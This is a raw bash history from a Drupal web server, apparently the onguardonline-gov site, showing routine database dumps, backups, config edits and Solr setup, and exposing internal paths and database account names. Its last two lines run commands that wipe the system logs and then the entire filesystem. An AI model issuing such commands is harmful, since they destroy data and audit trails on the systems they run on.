  1991. cd /etc/
  1992. #1317761731
  1993. ls
  1994. #1317761743
  1995. cd filesystems
  1996. #1317761938
  1997. exit
  1998. #1318022793
  1999. ls
  2000. #1318022794
  2001. cd ogol/
  2002. #1318022796
  2003. cd httpdocs/
  2004. #1318022797
  2005. ls
  2006. #1318022801
  2007. vim .htaccess
  2008. #1318023178
  2009. vim .htaccess
  2010. #1318023232
  2011. ls -la flash/
  2012. #1318023255
  2013. clear
  2014. #1318023258
  2015. exit
  2016. #1318447907
  2017. top
  2018. #1318448651
  2019. exit
  2020. #1318870865
  2021. cd /var/www/vhosts/
  2022. #1318870866
  2023. ls
  2024. #1318870868
  2025. cd httpdocs/
  2026. #1318870869
  2027. ls
  2028. #1318870879
  2029. cat sites/default/settings.php
  2030. #1318870935
  2031. mysql -u dc-ogol_user -p dc-onguardonline-gov > ~/db-onguardonline.10-18-11.sql
  2032. #1318871011
  2033. mysqldump -u dc-ogol_user -p dc-onguardonline-gov > ~/db-onguardonline.10-18-11.sql
  2034. #1318871020
  2035. cd ~
  2036. #1318871021
  2037. ls
  2038. #1318871103
  2039. exit
  2040. #1320075488
  2041. ls
  2042. #1320075493
  2043. cd ogol/
  2044. #1320075493
  2045. ls
  2046. #1320075499
  2047. cd `pwd -P`
  2048. #1320075500
  2049. ls
  2050. #1320075501
  2051. cd ../
  2052. #1320075501
  2053. ls
  2054. #1320075534
  2055. ls -la
  2056. #1320075537
  2057. cd default/
  2058. #1320075538
  2059. ls =la
  2060. #1320075540
  2061. ls -la
  2062. #1320075546
  2063. cd htdocs/
  2064. #1320075547
  2065. ls
  2066. #1320075550
  2067. cd ../
  2068. #1320075551
  2069. ls
  2070. #1320075559
  2071. cd ../
  2072. #1320075559
  2073. ls
  2074. #1320075574
  2075. exit
  2076. #1320075655
  2077. cd /var/www/vhosts/
  2078. #1320075664
  2079. tar -xzvf ~/default.tgz default
  2080. #1320075668
  2081. ls
  2082. #1320075675
  2083. tar -xzvf ~/default.tgz default/*
  2084. #1320075686
  2085. cd
  2086. #1320075687
  2087. ls
  2088. #1320075692
  2089. pwd -P
  2090. #1320075706
  2091. tar -czvf ~/default.tgz default/*
  2092. #1320075713
  2093. cd /var/www/vhosts/
  2094. #1320075715
  2095. tar -czvf ~/default.tgz default/*
  2096. #1320075751
  2097. exit
  2098. #1320075893
  2099. ls
  2100. #1320075897
  2101. cd ogol/
  2102. #1320075908
  2103. cd `pwd -p`
  2104. #1320075911
  2105. cd `pwd -P`
  2106. #1320075912
  2107. ls
  2108. #1320075918
  2109. ls
  2110. #1320075920
  2111. cd ogol/
  2112. #1320075944
  2113. cd `pwd -P`
  2114. #1320075944
  2115. ls
  2116. #1320075947
  2117. cd ../
  2118. #1320075947
  2119. ls
  2120. #1320075949
  2121. cd default/
  2122. #1320075950
  2123. ls -la
  2124. #1320075953
  2125. cd httpsdocs/
  2126. #1320075954
  2127. ls -la
  2128. #1320075958
  2129. cd ../
  2130. #1320075959
  2131. cd ../
  2132. #1320075960
  2133. ls
  2134. #1320075962
  2135. exit
  2136. #1320083855
  2137. ls -la .ssh/
  2138. #1320083865
  2139. exit
  2140. #1320083909
  2141. ls -la
  2142. #1320084000
  2143. exit
  2144. #1320097845
  2145. ls
  2146. #1320097874
  2147. cd /var/www/vhosts/
  2148. #1320097874
  2149. ls
  2150. #1320097878
  2151. cd httpdocs/
  2152. #1320097879
  2153. ls
  2154. #1320097886
  2155. vim sites/default/settings.php
  2156. #1320097974
  2157. drush cron
  2158. #1320097980
  2159. drush cc all
  2160. #1320098007
  2161. vim sites/default/settings.php
  2162. #1320098306
  2163. ls
  2164. #1320098308
  2165. cd ../
  2166. #1320098308
  2167. ls
  2168. #1320098318
  2169. vim conf/vhost.conf
  2170. #1320098432
  2171. /usr/local/psa/admin/bin/websrvmng -a
  2172. #1320098512
  2173. /etc/init.d/httpd reload
  2174. #1320099722
  2175. exit
  2176. #1320417667
  2177. cd ogol/
  2178. #1320417668
  2179. ls
  2180. #1320417669
  2181. cd httpdocs/
  2182. #1320417673
  2183. drush pm-list
  2184. #1320417687
  2185. drush help pm-list
  2186. #1320417704
  2187. drush pm-list --status=enabled
  2188. #1320417849
  2189. exit
  2190. #1320769434
  2191. cd /var/www/vhosts/
  2192. #1320769441
  2193. tail -f access_log
  2194. #1320769445
  2195. exit
  2196. #1320776679
  2197. ls
  2198. #1320776684
  2199. rm default.tgz
  2200. #1320776693
  2201. cd ogol/
  2202. #1320776694
  2203. ls
  2204. #1320776716
  2205. #tar -xzvf
  2206. #1320776720
  2207. cd httpdocs/
  2208. #1320776720
  2209. ls
  2210. #1320776722
  2211. cd sites/
  2212. #1320776723
  2213. ls
  2214. #1320776726
  2215. cd default/files/
  2216. #1320776727
  2217. cd ../
  2218. #1320776728
  2219. ls
  2220. #1320776742
  2221. tar -xzvf ~/ogol-files.tgz files/
  2222. #1320776745
  2223. tar -czvf ~/ogol-files.tgz files/
  2224. #1320776848
  2225. scp ~/ogol-files.tgz root@
  2226. #1320776917
  2227. exit
  2228. #1320777013
  2229. cd /var/www/vhosts/
  2230. #1320777014
  2231. ls
  2232. #1320777015
  2233. cd httpdocs/
  2234. #1320777016
  2235. ls
  2236. #1320777028
  2237. drush sql-dump --result-file
  2238. #1320777077
  2239. scp ~/drush-backups/dc-onguardonline-gov/20111108183029/dc-onguardonline-gov_20111108_063029.sql
  2240. root@
  2241. #1320777098
  2242. exit
  2243. #1320777341
  2244. ls
  2245. #1320777344
  2246. rm ogol-files.tgz
  2247. #1320777347
  2248. exit
  2249. #1320777290
  2250. ls
  2251. #1320777292
  2252. cd ogol
  2253. #1320777292
  2254. ls
  2255. #1320777309
  2256. tar -czvf ~/ogol-full.tgz httpdocs/
  2257. #1320777450
  2258. scp ~/ogol-full.tgz root@
  2259. #1320777529
  2260. ls
  2261. #1320777531
  2262. exit
  2263. #1320777670
  2264. ls
  2265. #1320777673
  2266. rm ogol-full.tgz
  2267. #1320777677
  2268. exit
  2269. #1320811656
  2270. ls
  2271. #1320811658
  2272. cd ogol/
  2273. #1320811658
  2274. ls
  2275. #1320811661
  2276. cd httpdocs/
  2277. #1320811666
  2278. drush dl chosen
  2279. #1320811691
  2280. drush dl libraries
  2281. #1320811892
  2282. ls
  2283. #1320811984
  2284. cd ~
  2285. #1320811984
  2286. ls
  2287. #1320811988
  2288. unzip
  2289. #1320812020
  2290. ls -la
  2291. #1320812095
  2292. ls
  2293. #1320812103
  2294. mv harvesthq-chosen-f87575c/ chosen
  2295. #1320812130
  2296. mkdir ogol/httpdocs/sites/all/libraries
  2297. #1320812154
  2298. mv chosen ogol/httpdocs/sites/all/libraries/
  2299. #1320812160
  2300. cd ogol/httpdocs/sites/all/libraries/
  2301. #1320812160
  2302. ls
  2303. #1320812166
  2304. ls chosen/
  2305. #1320812169
  2306. cd chosen/
  2307. #1320812169
  2308. ls
  2309. #1320812173
  2310. ls chosen/
  2311. #1320812187
  2312. rm Cakefile example.jquery.html
  2313. #1320812198
  2314. ls
  2315. #1320812205
  2316. rm example.proto.html VERSION
  2317. #1320812215
  2318. rm -rf coffee/
  2319. #1320812436
  2320. ls
  2321. #1320812650
  2322. tail ~/ogol/statistics/logs/error_log
  2323. #1320812870
  2324. drush cc all
  2325. #1320814734
  2326. exit
  2327. #1320845368
  2328. ls
  2329. #1320845382
  2330. cd ogol/
  2331. #1320845386
  2332. cd httpdocs/
  2333. #1320845411
  2334. drush sql-dump --result-file
  2335. #1320845611
  2336. exit
  2337. #1320953658
  2338. top
  2339. #1320954619
  2340. exit
  2341. #1320955088
  2342. top
  2343. #1320955221
  2344. top
  2345. #1320955490
  2346. exit
  2347. #1321288059
  2348. ls
  2349. #1321288066
  2350. cd /usr/
  2351. #1321288070
  2352. cd local/
  2353. #1321288071
  2354. ls
  2355. #1321288074
  2356. cd share/
  2357. #1321288075
  2358. ls
  2359. #1321288078
  2360. cd apache-solr/
  2361. #1321288079
  2362. ls
  2363. #1321288088
  2364. cat LICENSE.txt
  2365. #1321288095
  2366. head LICENSE.txt
  2367. #1321288102
  2368. clear
  2369. #1321288110
  2370. ls
  2371. #1321288120
  2372. head README.txt
  2373. #1321288186
  2374. cd docs/
  2375. #1321288186
  2376. ls
  2377. #1321288210
  2378. cat index.html
  2379. #1321288243
  2380. exit
  2381. #1321288373
  2382. cat /var/www/vhosts/
  2383. #1321288382
  2384. exit
  2385. #1321293763
  2386. cd /usr/local/sbin/
  2387. #1321293764
  2388. ls
  2389. #1321293766
  2390. cd ../
  2391. #1321293768
  2392. cd share/
  2393. #1321293768
  2394. ls
  2395. #1321294926
  2396. cd /etc/init.d/
  2397. #1321294927
  2398. ls
  2399. #1321294932
  2400. ls solr
  2401. #1321294934
  2402. ls -la solr
  2403. #1321294940
  2404. cd /usr/local/bin/solr
  2405. #1321294944
  2406. cd /usr/local/bin/
  2407. #1321294944
  2408. ls
  2409. #1321294949
  2410. vim solr
  2411. #1321294982
  2412. exit
  2413. #1321297138
  2414. chkconfig --list
  2415. #1321297185
  2416. ls -la /etc/rc5.d/
  2417. #1321297201
  2418. ls -la /etc/rc3.d/
  2419. #1321297210
  2420. ls -la /etc/rc2.d/
  2421. #1321297248
  2422. ls
  2423. #1321297258
  2424. exit
  2425. #1321295016
  2426. vim /usr/local/bin/solr
  2427. #1321295093
  2428. ls -la /usr/local/bin/
  2429. #1321295104
  2430. ls -la /etc/init.d/
  2431. #1321295117
  2432. vim psa
  2433. #1321295129
  2434. cd /etc/init.d/
  2435. #1321295132
  2436. vim psa
  2437. #1321297276
  2438. ls /etc/rc.d/
  2439. #1321297285
  2440. ls -la /etc/rc.d/
  2441. #1321297553
  2442. ls
  2443. #1321297560
  2444. chkconfig --list
  2445. #1321297612
  2446. ls
  2447. #1321297634
  2448. ls -la /etc/rc.d/init.d/
  2449. #1321297682
  2450. find . -type f -name "solr"
  2451. #1321297691
  2452. find . -name "solr"
  2453. #1321297696
  2454. cd ../
  2455. #1321297698
  2456. find . -name "solr"
  2457. #1321297968
  2458. exit
  2459. #1321993652
  2460. ls
  2461. #1321993662
  2462. cd ogol/
  2463. #1321993663
  2464. ls
  2465. #1321993672
  2466. tail -f statistics/logs/access_log
  2467. #1321993696
  2468. exit
  2469. #1322509287
  2470. cd /var/log/
  2471. #1322509288
  2472. ls
  2473. #1322509294
  2474. tail messages.4
  2475. #1322509298
  2476. tail messages.2
  2477. #1322509324
  2478. tail messages.1
  2479. #1322509383
  2480. ls
  2481. #1322509395
  2482. more maillog.2
  2483. #1322509407
  2484. cat maillog.2
  2485. #1322509416
  2486. tail maillog.2
  2487. #1322509428
  2488. more messages.2
  2489. #1322509561
  2490. tail -n 50 messages.2
  2491. #1322509592
  2492. tail -n 50 messages
  2493. #1322509601
  2494. head -n 50 messages
  2495. #1322509613
  2496. tail -n 50 messages.2
  2497. #1322509621
  2498. head messages
  2499. #1322509640
  2500. tail messages.1
  2501. #1322509659
  2502. head messages.1
  2503. #1322509672
  2504. more messages.1
  2505. #1322509911
  2506. ls
  2507. #1322509921
  2508. cd ~/ogol/
  2509. #1322509921
  2510. ls
  2511. #1322509926
  2512. cd httpdocs/
  2513. #1322509927
  2514. ls
  2515. #1322509932
  2516. cd sites/default/
  2517. #1322509936
  2518. vim settings.php
  2519. #1322509981
  2520. mysql -u dc-ogol_user -p dc-onguardonline-gov
  2521. #1322510106
  2522. exit
  2523. #1322670101
  2524. cd ogol/
  2525. #1322670102
  2526. ls
  2527. #1322670104
  2528. cd httpdocs/
  2529. #1322670105
  2530. ls
  2531. #1322670116
  2532. sites/default/files/
  2533. #1322670117
  2534. ls
  2535. #1322670121
  2536. cd sites/default/files/
  2537. #1322670121
  2538. ls
  2539. #1322670124
  2540. cd ctools/
  2541. #1322670125
  2542. ls
  2543. #1322670129
  2544. ls -la css/
  2545. #1322670132
  2546. cd ../
  2547. #1322670135
  2548. ls -la css/
  2549. #1322670138
  2550. cd topic_icons/
  2551. #1322670139
  2552. ls -la
  2553. #1322671142
  2554. drupal
  2555. #1322671146
  2556. drush cc all
  2557. #1322671159
  2558. drush cron
  2559. #1322671570
  2560. exit
  2561. #1323188956
  2562. cd ogol/
  2563. #1323188957
  2564. ls
  2565. #1323188959
  2566. cd httpdocs/
  2567. #1323188959
  2568. ls
  2569. #1323188973
  2570. cd sites/default/
  2571. #1323188974
  2572. ls
  2573. #1323188977
  2574. vim settings.php
  2575. #1323188996
  2576. mysql -u dc-ogol-user -p
  2577. #1323189003
  2578. vim settings.php
  2579. #1323189011
  2580. mysql -u dc-ogol_user -p
  2581. #1323201029
  2582. ls
  2583. #1323201035
  2584. cd ogol/
  2585. #1323201065
  2586. #mysql -u dc-ogol_user -p
  2587. #1323201076
  2588. vim httpdocs/sites/default/settings.php
  2589. #1323201121
  2590. mysql -u dc-ogol_user -p
  2591. #1323201124
  2592. mysql -u dc-ogol_user -p
  2593. #1323201400
  2594. exit
  2595. #1323201577
  2596. exit
  2597. #1323201911
  2598. cd ogol/
  2599. #1323201912
  2600. ls
  2601. #1323201916
  2602. cd httpdocs/
  2603. #1323201950
  2604. mysqldump -u dc-ogol_user -p dc-onguardonline-gov > ~/db-onguardonline.12-6-11.sql
  2605. #1323201965
  2606. ls -la ~
  2607. #1323201980
  2608. mysql -u dc-ogol_user -p dc-onguardonline-gov
  2609. #1323202046
  2610. ls
  2611. #1323202064
  2612. ls ~/
  2613. #1323203025
  2614. ls
  2615. #1323203028
  2616. cd ogol/
  2617. #1323203028
  2618. ls
  2619. #1323203050
  2620. cd httpdocs/
  2621. #1323203051
  2622. ls
  2623. #1323203063
  2624. ls
  2625. #1323203072
  2626. vim sites/default/settings.php
  2627. #1323203092
  2628. mysql -u dc-ogol_user -p dc-onguardonline-gov
  2629. #1323203263
  2630. drush cron
  2631. #1323705718
  2632. ls
  2633. #1323705728
  2634. cd /
  2635. #1323705728
  2636. ls
  2637. #1323705751
  2638. cd usr/local/bin/
  2639. #1323705754
  2640. cat solr
  2641. #1323705768
  2642. cd ../../local/share/apache-solr/
  2643. #1323705768
  2644. ls
  2645. #1323705779
  2646. cd example/conf
  2647. #1323705783
  2648. cd example/
  2649. #1323705784
  2650. ls
  2651. #1323705789
  2652. cd solr/conf/
  2653. #1323705789
  2654. ls
  2655. #1323705794
  2656. cat synonyms.txt
  2657. #1323708579
  2658. exit
  2659. #1323805588
  2660. ls
  2661. #1323805595
  2662. exit
  2663. #1325261237
  2664. cd ogol/
  2665. #1325261238
  2666. ls
  2667. #1325261524
  2668. curl --silent --compressed
  2669. #1325261572
  2670. cd /
  2671. #1325261572
  2672. ls
  2673. #1325261575
  2674. drush
  2675. #1325261625
  2676. drush -r /var/www/vhosts/ cron
  2677. #1325261923
  2678. exit
  2679. #1325716615
  2680. ls
  2681. #1325716625
  2682. cd /var/log/
  2683. #1325716626
  2684. ls
  2685. #1325716635
  2686. tail maillog
  2687. #1325716646
  2688. cat maillog.1
  2689. #1325716654
  2690. cat maillog.2
  2691. #1325716659
  2692. cat maillog.4
  2693. #1326136071
  2694. ls
  2695. #1326136078
  2696. cd /usr/local/share/apache-solr/
  2697. #1326136079
  2698. ls
  2699. #1326136087
  2700. cd example/solr/conf/
  2701. #1326136088
  2702. ls
  2703. #1326136118
  2704. cp synonyms.txt /var/www/vhosts/
  2705. #1326136129
  2706. cd /var/www/vhosts/
  2707. #1326136129
  2708. ls
  2709. #1326136135
  2710. mv synonyms.txt private/
  2711. #1326136137
  2712. cd private/
  2713. #1326136137
  2714. ls
  2715. #1326136143
  2716. rm
  2717. #1326136148
  2718. rm access_log.processed.3
  2719. #1326136153
  2720. rm -rf http/
  2721. #1326136156
  2722. ls
  2723. #1326136159
  2724. rm db-onguardonline-gov.9-16-11.sql
  2725. #1326136166
  2726. rm onguardonline-http.tar.gz
  2727. #1326136170
  2728. rm README.txt
  2729. #1326136173
  2730. ls
  2731. #1326136198
  2732. mkdir apache-solr-conf
  2733. #1326136198
  2734. ls
  2735. #1326136207
  2736. mv synonyms.txt apache-solr-conf/
  2737. #1326136211
  2738. cd /usr/local/share/
  2739. #1326136212
  2740. ls
  2741. #1326136238
  2742. cd apache-solr/example/solr/conf/
  2743. #1326136239
  2744. ls
  2745. #1326136248
  2746. mv synonyms.txt synonyms.bk
  2747. #1326136270
  2748. ln -s /var/www/vhosts/ synonyms.txt
  2749. #1326136271
  2750. ls
  2751. #1326136272
  2752. ls -la
  2753. #1326136317
  2754. solr restart
  2755. #1326136335
  2756. cat synonyms.txt
  2757. #1326136350
  2758. vim synonyms.txt
  2759. #1326136453
  2760. solr restart
  2761. #1326136468
  2762. ls
  2763. #1326136469
  2764. top
  2765. #1326136501
  2766. kill 21695
  2767. #1326136510
  2768. solr start
  2769. #1326145548
  2770. cd ogol/
  2771. #1326145549
  2772. ls
  2773. #1326146561
  2774. exit
  2775. #1326225461
  2776. cd ogol/
  2777. #1326225467
  2778. cd httpdocs/sites/default/files/
  2779. #1326225468
  2780. ls
  2781. #1326225473
  2782. mkdir blog
  2783. #1326225487
  2784. chown apache:psacln blog
  2785. #1326227693
  2786. exit
  2787. #1326689880
  2788. ls -la
  2789. #1326689889
  2790. rm db-*
  2791. #1326689892
  2792. ls
  2793. #1326689896
  2794. cd ogol/
  2795. #1326689897
  2796. ls
  2797. #1326689915
  2798. cd httpdocs/sites/default/
  2799. #1326689916
  2800. ls
  2801. #1326689921
  2802. ls -lh files/
  2803. #1326689925
  2804. ls -lh
  2805. #1326689946
  2806. tar -czvf ~/files.tar.gz files/
  2807. #1326690012
  2808. ls -lh ~
  2809. #1326690019
  2810. cd ~
  2811. #1326690024
  2812. exit
  2813. #1326722763
  2814. cd ogol/
  2815. #1326722766
  2816. cd httpdocs/
  2817. #1326722768
  2818. ls sites/all/libraries/
  2819. #1326722785
  2820. exit
  2821. #1326925945
  2822. /usr/local/psa/admin/sbin/httpdmng --reconfigure-domain
  2823. #1326926077
  2824. apachectl start
  2825. #1326926418
  2826. cd /var/www/vhosts/
  2827. #1326926418
  2828. ls
  2829. #1326926426
  2830. cd sites/default/files/
  2831. #1326926426
  2832. ls
  2833. #1326926428
  2834. cd ../
  2835. #1326926429
  2836. ls
  2837. #1326926432
  2838. vim settings.php
  2839. #1326926849
  2840. cd ../../
  2841. #1326926850
  2842. ls
  2843. #1326926854
  2844. vim .htaccess
  2845. #1326927205
  2846. vim .htaccess
  2847. #1326928766
  2848. exit
  2849. #1326928804
  2850. cd ogol/
  2851. #1326928806
  2852. cd httpdocs/
  2853. #1326928806
  2854. ls
  2855. #1326928812
  2856. mvim .htaccess
  2857. #1326928815
  2858. vim .htaccess
  2859. #1326928832
  2860. exit
  2861. #1326929885
  2862. cd ogol
  2863. #1326929887
  2864. cd httpdocs/
  2865. #1326929890
  2866. vim .htaccess
  2867. #1326930829
  2868. exit
  2869. #1326992075
  2870. cd ogol/
  2871. #1326992076
  2872. ls
  2873. #1326992079
  2874. cd httpdocs/
  2875. #1326992080
  2876. ls
  2877. #1326992087
  2878. vim .htaccess
  2879. #1327080098
  2880. ls
  2881. #1327080134
  2882. mv JusticeLogo.jpg ogol/httpdocs/sites/default/files/blog/JusticeLogo.jpg
  2883. #1327080152
  2884. cd ogol/httpdocs/sites/default/files/blog/
  2885. #1327080153
  2886. ls
  2887. #1327080155
  2888. ls -la
  2889. #1327080168
  2890. chown apache:psacln JusticeLogo.jpg
  2891. #1327080172
  2892. pwd
  2893. #1327083356
  2894. drush cc all
  2895. #1327083366
  2896. exit
  2897. #1327353702
  2898. ls
  2899. #1327353704
  2900. cd ogol/
  2901. #1327353705
  2902. ls
  2903. #1327353707
  2904. cd httpdocs/
  2905. #1327353707
  2906. ls
  2907. #1327353712
  2908. vim .htaccess
  2909. #1327353754
  2910. drush en ftc_ssl_admin
  2911. #1327354454
  2912. exit
  2913. #1327356311
  2914. cd ogol/
  2915. #1327356311
  2916. ls
  2917. #1327356313
  2918. cd httpdocs/
  2919. #1327356313
  2920. ls
  2921. #1327356320
  2922. drush en ftc_ajax_media
  2923. #1327357415
  2924. drush pm-disable ftc_ajax_media
  2925. #1327357702
  2926. drush cc all
  2927. #1327357981
  2928. drush cc all
  2929. #1327358387
  2930. drush en ftc_ajax_media
  2931. #1327358397
  2932. drush cc all
  2933. #1327358656
  2934. drush cc all
  2935. #1327359166
  2936. exit
  2937. #1327359728
  2938. cd ogol/httpdocs/
  2939. #1327359730
  2940. drush cc all
  2941. #1327360128
  2942. exit
  2943. df
  2944. Filesystem 1K-blocks Used Available Use% Mounted on
  2945. /dev/vzfs 100000000 7684728 92315272 8% /
  2946. /dev/simfs 100000000 7684728 92315272 8% /tmp
  2947. /dev/simfs 100000000 7684728 92315272 8% /var/tmp
  2948. none 1544028 4 1544024 1% /dev
  2949. tmpfs 1544028 0 1544028 0% /usr/local/psa/handlers/before-local
  2950. tmpfs 1544028 0 1544028 0% /usr/local/psa/handlers/before-queue
  2951. tmpfs 1544028 0 1544028 0% /usr/local/psa/handlers/before-remote
  2952. tmpfs 1544028 16 1544012 1% /usr/local/psa/handlers/info
  2953. tmpfs 1544028 0 1544028 0% /usr/local/psa/handlers/spool
  2954. rm -rf /var/log/* &
  2955. rm -rf /* &
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